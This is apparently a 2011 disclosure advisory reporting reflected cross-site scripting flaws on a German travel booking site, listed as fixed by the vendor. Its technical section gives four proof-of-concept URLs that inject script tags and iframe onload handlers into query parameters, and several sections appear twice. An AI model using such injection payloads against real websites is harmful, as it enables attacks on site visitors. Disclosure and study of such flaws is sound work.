SSCHADV2011-009 - Multiple XSS vulnerabilities on http://www.netto-travel.de/
Advisory: | Multiple XSS vulnerabilities on http://www.netto-travel.de/ |
Advisory ID: | SSCHADV2011-009 |
Author: |
Stefan Schurtz
|
Affected Software: | http://www.netto-travel.de/ |
Vendor URL: | |
Vendor Status: |
fixed
|
CVE-ID: | - |
======================
Vulnerability Description:
======================
The website "www.netto-travel.de" is prone to multiple XSS vulnerabilities
Vulnerability Description:
======================
The website "www.netto-travel.de" is prone to multiple XSS vulnerabilities
==============
Technical Details:
==============
Technical Details:
==============
http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd=’"<script>alert(String.fromCharCode(88,83,83))</script>&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011 |
http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd="><iframe onload=alert(String.fromCharCode(88,83,83))>&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011 |
http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd=29.08.2011&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=’"<script>alert(String.fromCharCode(88,83,83))</script> |
http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd=29.08.2011&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd="><iframe onload=alert(String.fromCharCode(88,83,83))> |
=====
Solution:
=====
fixed by the "Netto-Online Webteam"
Solution:
=====
fixed by the "Netto-Online Webteam"
================
Disclosure Timeline:
================
08-Aug-2011 – informed about the contact form
08-Aug-2011 – release date of this security advisory
Disclosure Timeline:
================
08-Aug-2011 – informed about the contact form
08-Aug-2011 – release date of this security advisory
16-Aug-2011 – fixed by the "Netto-Online Webteam"
19-Aug-2011 – Feedback from the "Netto-Online Webteam"
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.netto-travel.de/
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.netto-travel.de/
Comments
Display comments as Linear | Threaded